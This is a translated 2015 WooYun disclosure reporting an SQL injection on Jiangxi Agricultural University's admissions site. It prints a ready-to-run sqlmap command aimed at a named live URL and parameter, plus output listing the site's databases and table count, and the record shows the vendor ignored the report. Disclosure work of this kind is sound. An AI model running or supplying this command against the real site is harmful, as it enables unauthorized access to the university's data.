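Vulnerability Summary

Bug ID: wooyun-2015-0142079

Title: University Security: SQL Injection at Jiangxi Agricultural University

Vendor: CCERT Education Network Emergency Response Team

Author: 冷白开。

Submitted: 2015-09-19 23:03

Fixed: 2015-09-24 23:04

Disclosed: 2015-09-24 23:04

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CCERT Education Network Emergency Response Team) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]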


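Vulnerability Details

Disclosure status:

2015-09-19: Details reported to the vendor; awaiting vendor response
2015-09-24: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

University Security: SQL Injection at Jiangxi Agricultural University

Detailed description: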

sqlmap.py -u "http://zs.jxau.edu.cn/showpic.php?id=1" --dbs

available databases [2]:
[*] information_schema
[*] zs_jxau
Database: zs_jxau
[96 tables]

Proof of vulnerability:

See above.

Remediation:

You know what to do.

Copyright notice: please credit the source when reposting: 冷白开。@乌云


Vulnerability Response

Vendor response:

Severity: No impact; ignored by vendor

Ignored at: 2015-09-24 23:04

Vendor reply:

Latest status:

None